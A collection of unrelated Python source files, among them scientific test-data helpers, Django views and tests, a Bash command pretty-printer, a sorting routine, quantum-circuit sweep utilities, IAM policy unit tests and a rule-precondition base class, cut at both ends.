elements. Similarly for the variance and mask arrays. If one or
more of the data, var or mask array arguments are provided, their
shapes must match each other and the optional shape argument.
Parameters
----------
data : float or numpy.ndarray
Either a 3D array to assign to the cube's data array, or a float
to assign to each element of the data array.
var : float or numpy.ndarray
Either a 3D array to assign to the cube's variance array, a float
to assign to each element of the variance array, or None if no
variance array is desired.
mask : Either a 3D boolean array to use to mask the data array, a
boolean value to assign to each element of the mask array, or
None, to indicate that all data values should be left unmasked.
shape : tuple of 3 integers
Either None, or the shape to give the data and variance arrays.
If either data or var are arrays, this must match their shape.
If shape==None and neither data nor var are arrays, (10,6,5) is used.
uwave : `astropy.units.Unit`
The units to use for wavelengths.
unit : `astropy.units.Unit`
The units of the data.
wcs : `mpdaf.obj.WCS`
The world coordinates of image pixels.
wave : `mpdaf.obj.WaveCoord`
The wavelength coordinates of spectral pixels.
copy : boolean
If true (default), the data, variance and mask arrays are copied.
"""
return _generate_test_data(data=data, var=var, ndim=3, **kwargs)
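# A minimal usage sketch (assumes the mpdaf test environment above is available):
# build the three default test objects and check their shapes against DEFAULT_SHAPE.
if __name__ == "__main__":
    cube = generate_cube()          # (10, 6, 5) cube filled with 2.3
    image = generate_image()        # (6, 5) image filled with 2.0
    spectrum = generate_spectrum()  # 10-pixel spectrum 0.5, 1, 2, ...
    assert tuple(cube.shape) == DEFAULT_SHAPE
    assert tuple(image.shape) == DEFAULT_SHAPE[1:]
    assert spectrum.shape[0] == DEFAULT_SHAPE[0]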
|
with open("Output.ini", "a") as text_file:
text_file.write("\nPurchase Amount: %s" % 5)
with open("Output.ini", "r") as text_file:
    print(text_file.read())
|
# coding=utf-8
# Copyright 2015 Square, Inc.
from __future__ import print_function, with_statement
import logging
from pants.task.task import Task
from textwrap import dedent
logger = logging.getLogger(__name__)
class ShowNewIdeaMovedMessage(Task):
"""Displays a message letting people know that the new-idea goal has been renamed."""
def execute(self):
self.context.log.info(dedent('''
The "./pants new-idea" goal has been promoted and is now just "./pants idea".
The previous, deprecated idea goal is now "./pants old-idea".
You may need to update any flags or options you have set (eg, --new-idea-project-name is now
just --idea-project-name).
'''))
self.context.log.error('Please re-run ./pants using "idea" instead of "new-idea".\n')
|
# -*- coding: utf-8 -*-
# @Author : liaozhi
# @Time : 2021-07-01
# @Contact : liaozhi_edo@163.com
"""
Features
"""
# packages
import numpy as np
from config import *
from sklearn.preprocessing import LabelEncoder, OneHotEncoder, MinMaxScaler
def extract_features(df, action):
"""
    Extract features.
    :param df: DataFrame of samples (train and test)
    :param action: str, name of the target action column
    :return:
        train_x, test_x: DataFrame of features
        train_y, test_y: Series of labels
"""
    # Features - must be re-initialized for every training task
DENSE_FEATURE_COLUMNS = ['videoplayseconds']
    # 1. Feature processing
# dense
df.fillna(value={f: 0.0 for f in DENSE_FEATURE_COLUMNS}, inplace=True)
    df[DENSE_FEATURE_COLUMNS] = np.log(1.0 + df[DENSE_FEATURE_COLUMNS])  # smoothing
mms = MinMaxScaler(feature_range=(0, 1))
    df[DENSE_FEATURE_COLUMNS] = mms.fit_transform(df[DENSE_FEATURE_COLUMNS])  # min-max normalization
    # One-hot features are also dense; they just don't need smoothing or normalization
for col in ONE_HOT_COLUMNS:
df[col] += 1
df.fillna(value={col: 0}, inplace=True)
encoder = OneHotEncoder(sparse=False)
tmp = encoder.fit_transform(df[[col]])
for idx in range(tmp.shape[1]):
DENSE_FEATURE_COLUMNS.append(str(col) + '_' + str(idx))
df[str(col) + '_' + str(idx)] = tmp[:, idx]
    # Convert data types
df[DENSE_FEATURE_COLUMNS] = df[DENSE_FEATURE_COLUMNS].astype('float32')
# varlen sparse
df = df.merge(FEED_TAG, on=['feedid'], how='left')
df = df.merge(FEED_KEYWORD, on=['feedid'], how='left')
# sparse
for col in SPARSE_FEATURE_COLUMNS:
if col == 'userid':
pass
elif col == 'feedid':
df[col] = df[col].apply(lambda x: FEEDID_MAP.get(x, 0))
elif col == 'feed':
df[col] = df[col].apply(lambda x: FEED_MAP.get(x, 0))
elif col == 'authorid':
pass
else:
            df[col] += 1  # 0 is reserved for unknown values
df.fillna(value={col: 0}, inplace=True)
le = LabelEncoder()
df[col] = le.fit_transform(df[col])
    # 2. Format the output
day = STAGE_END_DAY['test']
train_df, test_df = df.loc[df.date_ != day, :], df.loc[df.date_ == day, :]
feature_columns = DENSE_FEATURE_COLUMNS + SPARSE_FEATURE_COLUMNS + \
VARLEN_SPARSE_FEATURE_COLUMNS + list(WEIGHT_NAME.values())
train_x, train_y = train_df[feature_columns], train_df[action]
test_x, test_y = test_df[feature_columns], test_df[action]
return train_x, train_y, test_x, test_y
|
'''
Selection Sort
Time Complexity: O(N*N)
Space Complexity: 1
'''
from algorithms.Algorithm import Algorithm
class SelectionSort(Algorithm):
def __init__(self):
super().__init__("Selection Sort")
def algorithm(self):
for i in range(len(self.array)):
min_index = i
for j in range(i+1, len(self.array)):
if self.array[j] < self.array[min_index]:
min_index = j
self.array[i], self.array[min_index] = self.array[min_index], self.array[i]
#visualise the sorting
self.update(i, min_index)
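# A minimal standalone sketch (assumes nothing from the Algorithm base class): the
# same selection-sort logic as above, written as a plain function so it can be run
# without the visualisation framework.
def selection_sort(values):
    values = list(values)  # sort a copy, leave the input untouched
    for i in range(len(values)):
        min_index = i
        for j in range(i + 1, len(values)):
            if values[j] < values[min_index]:
                min_index = j
        values[i], values[min_index] = values[min_index], values[i]
    return values

assert selection_sort([5, 2, 4, 1, 3]) == [1, 2, 3, 4, 5]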
|
from django.views.generic import TemplateView
from rest_framework import views, serializers, status
from rest_framework.response import Response
class Index(TemplateView):
template_name = 'index.html'
class EncuestasIndex(TemplateView):
template_name = 'encuestas.html'
class MessageSerializer(serializers.Serializer):
message = serializers.CharField()
class EchoView(views.APIView):
def post(self, request, *args, **kwargs):
serializer = MessageSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
return Response(
serializer.data, status=status.HTTP_201_CREATED)
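# A minimal usage sketch (assumes a configured Django settings module; uses DRF's
# APIRequestFactory from rest_framework.test): exercising EchoView without going
# through urls.py. The "/echo/" path is hypothetical.
if __name__ == "__main__":
    from rest_framework.test import APIRequestFactory

    factory = APIRequestFactory()
    request = factory.post("/echo/", {"message": "hello"}, format="json")
    response = EchoView.as_view()(request)
    print(response.status_code, response.data)  # 201 {'message': 'hello'}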
|
import os
import zipfile
from pathlib import Path
from django.core.files.base import ContentFile
from django.test import TestCase
from django.test.client import Client
import pandas as pd
from pm4pymdl.objects.ocel.importer import importer as ocel_importer
from apps.index import models
from modules import utils
STANDARD_TEST_LOG = Path("./cache/running-example.jsonocel")
def get_event_log():
if not os.path.exists(STANDARD_TEST_LOG.parent):
os.mkdir(STANDARD_TEST_LOG.parent)
if not os.path.exists(STANDARD_TEST_LOG):
os.system(
"curl ocel-standard.org/1.0/running-example.jsonocel.zip >> "
+ str(STANDARD_TEST_LOG)
+ ".zip"
)
with zipfile.ZipFile(str(STANDARD_TEST_LOG) + ".zip", "r") as zip_ref:
zip_ref.extractall(STANDARD_TEST_LOG.parent)
    result = ocel_importer.apply(str(STANDARD_TEST_LOG))
    # Note: the importer's return type is inconsistent (sometimes a 2-tuple,
    # sometimes a single frame); consider a pull request against pm4pymdl.
    if len(result) == 2:
        df, obj_df = result
    else:
        df = result
        obj_df = pd.DataFrame()
return df, obj_df
class AbstractTestCase(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.df, cls.obj_df = get_event_log()
def setUp(self):
self.df, self.obj_df = self.__class__.df, self.__class__.obj_df
@classmethod
def save_event_log_to_db(cls):
json_string = utils.apply_json(cls.df, cls.obj_df)
hash, log = utils.event_log_by_hash(json_string)
event_log = models.EventLog.objects.create()
event_log.name = os.path.splitext(STANDARD_TEST_LOG.name)[0]
event_log.file.save(
event_log.name + ".jsonocel",
ContentFile(json_string),
)
event_log.hash = hash
event_log.save()
cls.event_log = event_log
return event_log
class ModelTestCase(AbstractTestCase):
def test_no_duplicate_logs(self):
event_log = self.save_event_log_to_db()
hash_2, log_2 = utils.event_log_by_hash(utils.apply_json(self.df, self.obj_df))
self.assertEqual(event_log.hash, hash_2)
self.assertEqual(event_log.id, log_2.id)
class WebpageAvailabilityTestCase(AbstractTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.save_event_log_to_db()
def setUp(self):
super().setUp()
self.client = Client()
self.event_log = self.__class__.event_log
def test_upload_no_log(self):
response = self.client.get("/")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/upload.html", [template.name for template in response.templates]
)
def test_upload_valid_log(self):
response = self.client.get(f"?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/upload.html", [template.name for template in response.templates]
)
def test_upload_invalid_log(self):
response = self.client.get(f"?id=foo")
self.assertEqual(response.status_code, 404)
def test_filtering_no_log(self):
response = self.client.get("/filtering")
self.assertEqual(response.status_code, 404)
def test_filtering_valid_log(self):
response = self.client.get(f"/filtering?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/filtering.html", [template.name for template in response.templates]
)
self.assertContains(response, self.event_log.name)
self.assertContains(response, 'id="btn-submit"')
self.assertContains(response, 'name="id"')
def test_filtering_invalid_log(self):
response = self.client.get(f"/filtering?id=foo")
self.assertEqual(response.status_code, 404)
def test_filter_no_log(self):
response = self.client.get("/filter")
self.assertEqual(response.status_code, 404)
def test_filter_valid_log(self):
response = self.client.get(f"/filter?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/filter.html", [template.name for template in response.templates]
)
self.assertContains(response, 'id="row-select"')
self.assertContains(response, 'id="column-select"')
self.assertContains(response, 'id="btn-create-cell"')
self.assertContains(response, 'name="id"')
def test_filter_invalid_log(self):
response = self.client.get(f"/filter?id=foo")
self.assertEqual(response.status_code, 404)
def test_visualization_no_log(self):
response = self.client.get("/visualize")
self.assertEqual(response.status_code, 404)
def test_visualization_valid_log(self):
response = self.client.get(f"/visualize?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"vis/vis.html", [template.name for template in response.templates]
)
self.assertContains(response, 'id="btn-dfg-freq"')
self.assertContains(response, 'id="btn-dfg-perf"')
self.assertContains(response, 'id="btn-petri"')
self.assertContains(response, 'name="id"')
def test_visualization_invalid_log(self):
response = self.client.get(f"/visualize?id=foo")
self.assertEqual(response.status_code, 404)
def test_comparative_no_log(self):
response = self.client.get("/comparative")
self.assertEqual(response.status_code, 404)
def test_comparative_valid_log(self):
response = self.client.get(f"/comparative?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/comparative.html", [template.name for template in response.templates]
)
def test_comparative_invalid_log(self):
response = self.client.get(f"/comparative?id=foo")
self.assertEqual(response.status_code, 404)
class PlotsTestCase(AbstractTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.save_event_log_to_db()
def setUp(self):
super().setUp()
self.client = Client()
self.event_log = self.__class__.event_log
self.longMessage = True
def test_histogram_invalid_id(self):
response = self.client.get(f"/plots/histogram/{self.df.columns[0]}?id=foo")
self.assertEqual(response.status_code, 404)
def test_histogram_invalid_column(self):
response = self.client.get(f"/plots/histogram/foo?id={self.event_log.id}")
self.assertEqual(response.status_code, 404)
def test_histogram_valid_event_columns(self):
a, b, c = utils.get_column_types(self.df)
for column in [*a, *b, *c]:
response = self.client.get(
f"/plots/histogram/{column}?id={self.event_log.id}"
)
self.assertEqual(response.status_code, 200, msg=f"Failed for {column}")
# self.assertContains(response,"<div class=\"plot-container plotly\">")
def test_histogram_valid_object_columns(self):
obj_numerical, obj_categorical, _ = utils.get_column_types(self.obj_df)
for column in [*obj_numerical, *obj_categorical]:
response = self.client.get(
f"/plots/histogram/{column}?id={self.event_log.id}"
)
self.assertEqual(response.status_code, 200)
# self.assertContains(response,"<div class=\"plot-container plotly\">")
def test_dfg_invalid_id(self):
response = self.client.get(f"/plots/dfg?id=foo")
self.assertEqual(response.status_code, 404)
def test_dfg_valid(self):
response = self.client.get(f"/plots/dfg?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<img")
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page_test
class ProfileCreator(page_test.PageTest):
"""Base class for an object that constructs a Chrome profile."""
def __init__(self):
super(ProfileCreator, self).__init__()
self._page_set = None
@property
def page_set(self):
return self._page_set
def ValidateAndMeasurePage(self, _, tab, results):
pass
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
import typing as t
__author__ = "Benjamin Kane"
__version__ = "0.1.0"
__doc__ = f"""
Pretty-print simple Bash command from one line of stdin
Examples:
echo 'echo "hi there" | awk "{{print $1}}"' | {sys.argv[0]}
Help:
Please see Benjamin Kane for help.
"""
def parse_args(*args, **kwargs):
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
return parser.parse_args(*args, **kwargs)
# need to tokenize into words, strings, pipes, options
# strings are surrounded by quotes - and can have nested quotes
# pipes are |
# options start with -
# Test with: python3 -m doctest format_shell.py
class Kind:
UNSET = "UNSET"
PIPE = "PIPE"
OPTION = "OPTION"
SINGLE_QUOTE_STRING = "SINGLE_QUOTE_STRING"
DOUBLE_QUOTE_STRING = "DOUBLE_QUOTE_STRING"
CMD = "CMD"
class Token(t.NamedTuple):
text: str
kind: Kind
def tokenize(expr):
"""Return a list of tokens
>>> list(tokenize(''))
[]
>>> list(tokenize(' '))
[]
>>> list(tokenize('|'))
[Token(text='|', kind='PIPE')]
>>> list(tokenize(' | '))
[Token(text='|', kind='PIPE')]
>>> list(tokenize(' | -'))
[Token(text='|', kind='PIPE'), Token(text='-', kind='OPTION')]
>>> list(tokenize(' | -bob'))
[Token(text='|', kind='PIPE'), Token(text='-bob', kind='OPTION')]
>>> list(tokenize(' | -bob "dillon"'))
[Token(text='|', kind='PIPE'), Token(text='-bob', kind='OPTION'), Token(text='"dillon"', kind='DOUBLE_QUOTE_STRING')]
>>> list(tokenize('echo | openssl s_client -connect www.example.com:443'))
[Token(text='echo', kind='CMD'), Token(text='|', kind='PIPE'), Token(text='openssl', kind='CMD'), Token(text='s_client', kind='CMD'), Token(text='-connect', kind='OPTION'), Token(text='www.example.com:443', kind='CMD')]
>>> list(tokenize('"bob'))
Traceback (most recent call last):
...
ValueError: Double quote at column 0 unmatched
>>> list(tokenize('"'))
Traceback (most recent call last):
...
ValueError: Double quote at column 0 unmatched
>>> list(tokenize('" "'))
[Token(text='" "', kind='DOUBLE_QUOTE_STRING')]
>>> list(tokenize('echo "hi there" | awk "{print $1}"'))
[Token(text='echo', kind='CMD'), Token(text='"hi there"', kind='DOUBLE_QUOTE_STRING'), Token(text='|', kind='PIPE'), Token(text='awk', kind='CMD'), Token(text='"{print $1}"', kind='DOUBLE_QUOTE_STRING')]
"""
start = 0
end = 0
kind = Kind.UNSET
len_expr = len(expr) # cache constant value
while True:
# eat whitespace
while end < len_expr and expr[end].isspace():
start += 1
end += 1
if end == len_expr:
return
if expr[end] == "|":
end += 1
yield Token(expr[start:end], Kind.PIPE)
start = end
elif expr[end] == "-":
while end < len_expr and not expr[end].isspace():
end += 1
yield Token(expr[start:end], Kind.OPTION)
start = end
elif expr[end] == '"':
while True:
end += 1
if end == len_expr:
raise ValueError(f"Double quote at column {start} unmatched")
if expr[end] == '"':
break
end += 1
yield Token(expr[start:end], Kind.DOUBLE_QUOTE_STRING)
start = end
elif expr[end] == "'":
while True:
end += 1
if end == len_expr:
raise ValueError(f"Single quote at column {start} unmatched")
if expr[end] == "'":
break
end += 1
yield Token(expr[start:end], Kind.SINGLE_QUOTE_STRING)
start = end
else: # not space, not anything else, must be cmd
while end < len_expr and not expr[end].isspace():
end += 1
yield Token(expr[start:end], Kind.CMD)
start = end
def print_cmd(tokens: t.Iterable[Token]):
for token in tokens:
if token.kind == Kind.PIPE:
print(f"\\\n| ", end="")
elif token.kind == Kind.OPTION:
print(f"\\\n {token.text} ", end="")
elif token.kind in (
Kind.CMD,
Kind.DOUBLE_QUOTE_STRING,
Kind.SINGLE_QUOTE_STRING,
):
print(f"{token.text} ", end="")
else:
raise ValueError(f"Unknown token kind: {token!r}")
print()
def main():
# get --help
parse_args()
command = sys.stdin.readline()
print_cmd(tokenize(command))
if __name__ == "__main__":
main()
|
import os.path
import unittest
import fluteline
import watson_streaming
import watson_streaming.transcriber
import watson_streaming.utilities
CREDENTIALS_PATH = 'credentials.json'
AUDIO_PATH = 'examples/audio_file.wav'
class TestSanity(unittest.TestCase):
def setUp(self):
if os.path.isfile(CREDENTIALS_PATH):
config = watson_streaming.transcriber._parse_credentials(CREDENTIALS_PATH)
else:
config = os.environ['WATSON_APIKEY'], os.environ['WATSON_HOSTNAME']
self.apikey, self.hostname = config
def test_sanity(self):
transcriber = watson_streaming.Transcriber(
settings={'interim_results': True},
apikey=self.apikey,
hostname=self.hostname,
)
file_audio_gen = watson_streaming.utilities.FileAudioGen(AUDIO_PATH)
pipeline = [file_audio_gen, transcriber]
fluteline.connect(pipeline)
fluteline.start(pipeline)
while True:
result = transcriber.output.get()
if 'results' in result:
transcript = result['results'][0]['alternatives'][0]['transcript']
expected = 'several tornadoes'
if transcript.startswith(expected):
break
else:
raise AssertionError("Didn't get expected transcript")
fluteline.stop(pipeline)
|
# Jared Dyreson
# CPSC 386-01
# 2021-11-29
# jareddyreson@csu.fullerton.edu
# @JaredDyreson
#
# Lab 00-04
#
# Some filler text
#
"""
This module contains the Intro display class
"""
import pygame
import functools
import sys
from Invaders.Dataclasses.point import Point
from Invaders.Displays.display import Display
from Invaders.UI.button import Button
class IntroDisplay(Display):
def __init__(self):
super().__init__()
self.logo_position = Point(225, 275)
self.break_from_draw = False
self.buttons = [
Button(
self._display_surface,
Point(300, 600),
300,
50,
"Start",
functools.partial(self.terminate_intro),
),
]
def terminate_intro(self):
"""
Kill the current window
"""
self.break_from_draw = True
def draw(self) -> None:
draw_loop = True
logo = pygame.image.load("assets/logo.png")
while draw_loop and not self.break_from_draw:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
self.draw_image(logo, self.logo_position)
for button in self.buttons:
self.write_text(
button.contents, button.center(), pygame.font.SysFont(None, 30)
)
button.draw()
pygame.display.flip()
|
import numpy as np
from predicu.data import CUM_COLUMNS
from predicu.preprocessing import preprocess_bedcounts
from predicu.tests.utils import load_test_data
def test_bedcounts_data_preprocessing():
test_data = load_test_data()
preprocessed = preprocess_bedcounts(test_data["bedcounts"])
assert len(preprocessed) > 0
for icu_name, dg in preprocessed.groupby("icu_name"):
dg = dg.sort_values(by="date")
for col in CUM_COLUMNS:
diffs = dg[col].diff(1).fillna(0).values
assert np.all(diffs >= 0)
|
import numpy as np
import sys
from scipy import stats
import matplotlib.pyplot as plt
from myfunction import cross_cov
from myfunction import gen_binary_obs
from myfunction import gen_binary
#=========================================================================================
# parameters:
#l = sys.argv[1] ; t1 = sys.argv[2] ; nh = sys.argv[3]
l = 501 ; t2 = 1260 ; nh = 0
print(l,t2,nh)
l = int(l) ; t2 = int(t2) ; nh = int(nh)
t1 = t2-l
#ext_name = '%02d.dat'%(nh)
ext_name = '%03d_%04d_%02d.dat'%(l,t2,nh)
s0 = np.loadtxt('close_open_binary.txt')
s0 = s0[t1:t2]
c0 = cross_cov(s0[1:],s0[:-1])
#=========================================================================================
w = np.loadtxt('W/w_%s'%ext_name)
h0 = np.loadtxt('W/h0_%s'%ext_name)
n2 = np.shape(w)[0]
if nh > 0:
sh = np.loadtxt('W/sh_%s'%ext_name)
if nh==1:
sh = sh[:,np.newaxis] # convert from (l,) --> (l,1)
n = n2 - nh
nsim = 200
c_isim = np.empty((n,n,nsim))
for isim in range(nsim):
# if nh == 0:
s = gen_binary(w,h0,l) # hidden configuration is NOT fixed
#else:
#s = gen_binary_obs(w,h0,sh)
c = cross_cov(s[1:,:n],s[:-1,:n])
c_isim[:,:,isim] = c
# average of all:
c_av = np.mean(c_isim,axis=2)
c_dev = np.std(c_isim,axis=2)
MSE = np.mean((c0 - c_av)**2)
slope = np.sum(c0*c_av)/np.sum(c0**2)
slope2_av, intercept_av, R_av, p_value, std_err = stats.linregress(c0.flatten(),c_av.flatten())
#--------------------------------------
print(nh,MSE,slope,R_av)
R_out=open('C/R_%s'%ext_name,'w')
R_out.write("% i % f % f % f \n"%(nh,MSE,slope,R_av))
R_out.close()
C_out=open('C/C_%s'%ext_name,'w')
for i in range(n):
for j in range(n):
C_out.write("% i % i % f % f \n"%(i+1, j+1, c0[i,j], c_av[i,j]))
C_out.close()
plt.plot([-0.2,0.2],[-0.2,0.2])
#plt.title('nh=%02d'%nh)
plt.scatter(c0,c_av)
#plt.show()
|
import pytest
from policyglass import EffectivePrincipal, Principal
def test_bad_union():
with pytest.raises(ValueError) as ex:
EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:root")).union(
Principal("AWS", "arn:aws:iam::123456789012:root")
)
assert "Cannot union EffectivePrincipal with Principal" in str(ex.value)
def test_union_simple():
assert EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:root")).union(
EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:role/RoleName"))
) == [EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:root"))]
def test_union_excluded_principal_addition():
"""If we have an inclusion that is a subset of another EffectivePrincipal's exclusions it must not be eliminated.
This is because it represents an additional allow which wasn't subject to the same exclusion in its original
statement. If it had been then it would have self-destructed by its own exclusions.
"""
a = EffectivePrincipal(Principal("AWS", "*"), frozenset({Principal("AWS", "arn:aws:iam::123456789012:root")}))
b = EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:role/RoleName"))
assert a.union(b) == [
EffectivePrincipal(Principal("AWS", "*"), frozenset({Principal("AWS", "arn:aws:iam::123456789012:root")})),
EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:role/RoleName")),
]
def test_union_disjoint():
a = EffectivePrincipal(
Principal("AWS", "arn:aws:iam::123456789012:root"),
frozenset({Principal("AWS", "arn:aws:iam::123456789012:role/RoleName")}),
)
b = EffectivePrincipal(Principal("AWS", "arn:aws:iam::098765432109:root"))
assert a.union(b) == [
EffectivePrincipal(
Principal("AWS", "arn:aws:iam::123456789012:root"),
frozenset({Principal("AWS", "arn:aws:iam::123456789012:role/RoleName")}),
),
EffectivePrincipal(Principal("AWS", "arn:aws:iam::098765432109:root")),
]
|
import tkinter
mainWindow = tkinter.Tk()
mainWindow.title('Hello World')
mainWindow.geometry('640x40')
# text inside using Label widget
label = tkinter.Label(mainWindow, text='Inside the window')
label.pack(side='top')
# create canvas widget inside
canvas = tkinter.Canvas(mainWindow, relief='raised', borderwidth=5)
canvas.pack(side='top', expand=False)
mainWindow.mainloop()
|
# sweep_generators.py
#
# This file is part of scqubits.
#
# Copyright (c) 2019, Jens Koch and Peter Groszkowski
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
############################################################################
import numpy as np
from tqdm.notebook import tqdm
import scqubits.core.sweep_observables as obs
from scqubits.core.spec_lookup import SpectrumLookup
from scqubits.core.storage import SpectrumData
from scqubits.settings import TQDM_KWARGS
def generate_chi_sweep(sweep):
"""Generate data for the AC Stark shift chi as a function of the sweep parameter"""
osc_subsys_list = sweep.hilbertspace.osc_subsys_list
qbt_subsys_list = sweep.hilbertspace.qbt_subsys_list
for osc_index, osc_subsys in osc_subsys_list:
for qbt_index, qubit_subsys in qbt_subsys_list:
sweep.compute_custom_data_sweep('chi_osc{}_qbt{}'.format(osc_index, qbt_index), obs.dispersive_chi,
qubit_subsys=qubit_subsys, osc_subsys=osc_subsys, chi_indices=(1, 0))
def generate_charge_matrixelem_sweep(sweep):
"""Generate data for the charge matrix elements as a function of the sweep parameter"""
for qbt_index, subsys in sweep.hilbertspace.qbt_subsys_list:
if type(subsys).__name__ in ['Transmon', 'Fluxonium']:
sweep.compute_custom_data_sweep('n_op_qbt{}'.format(qbt_index), obs.qubit_matrixelement,
qubit_subsys=subsys, qubit_operator=subsys.n_operator())
# **********************************************************************************************************************
def get_difference_spectrum(sweep, initial_state_ind=0, lookup=None):
"""Takes spectral data of energy eigenvalues and subtracts the energy of a select state, given by its state
index.
Parameters
----------
sweep: ParameterSweep
initial_state_ind: int or (i1, i2, ...)
index of the initial state whose energy is supposed to be subtracted from the spectral data
lookup: SpectrumLookup, optional
Returns
-------
SpectrumData object
"""
lookup = lookup or SpectrumLookup(sweep)
param_count = sweep.param_count
evals_count = sweep.evals_count
diff_eigenenergy_table = np.empty(shape=(param_count, evals_count))
for param_index in tqdm(range(param_count), desc="difference spectrum", **TQDM_KWARGS):
eigenenergies = sweep.dressed_specdata.energy_table[param_index]
if isinstance(initial_state_ind, int):
eigenenergy_index = initial_state_ind
else:
eigenenergy_index = lookup.dressed_index(initial_state_ind, param_index)
diff_eigenenergies = eigenenergies - eigenenergies[eigenenergy_index]
diff_eigenenergy_table[param_index] = diff_eigenenergies
return SpectrumData(sweep.param_name, sweep.param_vals, diff_eigenenergy_table, sweep.hilbertspace.__dict__)
def generate_target_states_list(sweep, initial_state_labels):
"""Based on a bare state label (i1, i2, ...) with i1 being the excitation level of subsystem 1, i2 the
excitation level of subsystem 2 etc., generate a list of new bare state labels. These bare state labels
correspond to target states reached from the given initial one by single-photon qubit transitions. These
are transitions where one of the qubit excitation levels increases at a time. There are no changes in
oscillator photon numbers.
Parameters
----------
sweep: ParameterSweep
initial_state_labels: tuple(int1, int2, ...)
bare-state labels of the initial state whose energy is supposed to be subtracted from the spectral data
Returns
-------
list of tuple"""
target_states_list = []
for subsys_index, qbt_subsys in sweep.hilbertspace.qbt_subsys_list: # iterate through qubit subsystems
initial_qbt_state = initial_state_labels[subsys_index]
for state_label in range(initial_qbt_state + 1, qbt_subsys.truncated_dim):
# for given qubit subsystem, generate target labels by increasing that qubit excitation level
target_labels = list(initial_state_labels)
target_labels[subsys_index] = state_label
target_states_list.append(tuple(target_labels))
return target_states_list
def get_n_photon_qubit_spectrum(sweep, photonnumber, initial_state_labels, lookup=None):
"""
Extracts energies for transitions among qubit states only, while all oscillator subsystems maintain their
excitation level.
Parameters
----------
sweep: ParameterSweep
photonnumber: int
number of photons used in transition
initial_state_labels: tuple(int1, int2, ...)
bare-state labels of the initial state whose energy is supposed to be subtracted from the spectral data
lookup: SpectrumLookup, optional
Returns
-------
SpectrumData object
"""
lookup = lookup or SpectrumLookup(sweep)
target_states_list = generate_target_states_list(sweep, initial_state_labels)
difference_energies_table = []
for param_index in tqdm(range(sweep.param_count), desc="n-photon spectrum", **TQDM_KWARGS):
difference_energies = []
initial_energy = lookup.energy_bare_index(initial_state_labels, param_index)
for target_labels in target_states_list:
target_energy = lookup.energy_bare_index(target_labels, param_index)
if target_energy is None or initial_energy is None:
difference_energies.append(np.NaN)
else:
difference_energies.append((target_energy - initial_energy) / photonnumber)
difference_energies_table.append(difference_energies)
return target_states_list, SpectrumData(sweep.param_name, sweep.param_vals, np.asarray(difference_energies_table),
sweep.hilbertspace.__dict__)
|
#!/usr/bin/env python
import os
import pyfwk
from pyfi.entity.entity.db import EntityDB
# -------------------------------ENTITY-FUND------------------------------#
class EntityFund(pyfwk.Model):
model = None
dbase = None
table = None
columns = None
@staticmethod
def instance():
if not EntityFund.model:
EntityFund.model = EntityFund()
return EntityFund.model
def __init__(self):
self.dbase = EntityDB.instance()
self.table = 'entityfund'
id = pyfwk.DBCol('id', 'INTEGER PRIMARY KEY')
entity = pyfwk.DBCol('entity', 'INTEGER')
category = pyfwk.DBCol('category', 'INTEGER')
fundfamily = pyfwk.DBCol('fundfamily', 'INTEGER')
self.columns = [id, entity, category, fundfamily]
self.validate()
# ----------------------------------MAIN----------------------------------#
def main():
fm = pyfwk.FileManager.instance()
fm.set_root(os.path.dirname(os.path.dirname(__file__)))
ef = EntityFund.instance()
if __name__ == '__main__':
main()
|
"""
This module contains the definition of Preconditions which describes what to do with
the received parameter and does the necessary changes. The preconditions are used to
enable developers skipping or enabling rules based on a set of conditions.
.. warning::
The precondition is for checking that a rule should or shouldn't run, not for
breaking/aborting the execution. To indicate a precondition failure as an error
in the logs, create a precondition which raises an exception if the requirements
doesn't match.
"""
from __future__ import annotations
from abc import ABC, abstractmethod
import logging
from typing import Any, Optional
from hammurabi.rules.abstract import AbstractRule
class Precondition(AbstractRule, ABC):
"""
This class which describes the bare minimum and helper functions for Preconditions.
A precondition defines what and how should be checked/validated before executing a Rule.
Since preconditions are special rules, all the functions available what can be used for
:class:`hammurabi.rules.base.AbstractRule`.
As said, preconditions are special from different angles. While this is not true for
Rules, Preconditions will always have a name, hence giving a name to a Precondition is not
necessary. In case no name given to a precondition, the name will be the name of the class
and " precondition" suffix.
Example usage:
.. code-block:: python
>>> import logging
>>> from typing import Optional
>>> from pathlib import Path
>>> from hammurabi import Precondition
>>>
>>> class IsFileExist(Precondition):
>>> def __init__(self, path: Optional[Path] = None, **kwargs) -> None:
>>> super().__init__(param=path, **kwargs)
>>>
>>> def task(self) -> bool:
>>> return self.param and self.param.exists()
:param name: Name of the rule which will be used for printing
:type name: Optional[str]
:param param: Input parameter of the rule will be used as ``self.param``
:type param: Any
.. note:
Since ``Precondition`` inherits from ``Rule``, the parameter after the name of the
precondition will be used for ``self.param``. This can be handy for interacting
with input parameters.
.. warning:
Although ``Precondition`` inherits from ``Rule``, the pipe and children execution
is intentionally not implemented.
"""
def __init__(self, name: Optional[str] = None, param: Optional[Any] = None) -> None:
name = name or f"{self.__class__.__name__} precondition"
super().__init__(name, param)
def __repr__(self) -> str:
return f'{self.__class__.__name__}(name="{self.name}", param="{self.param}")'
def __str__(self) -> str:
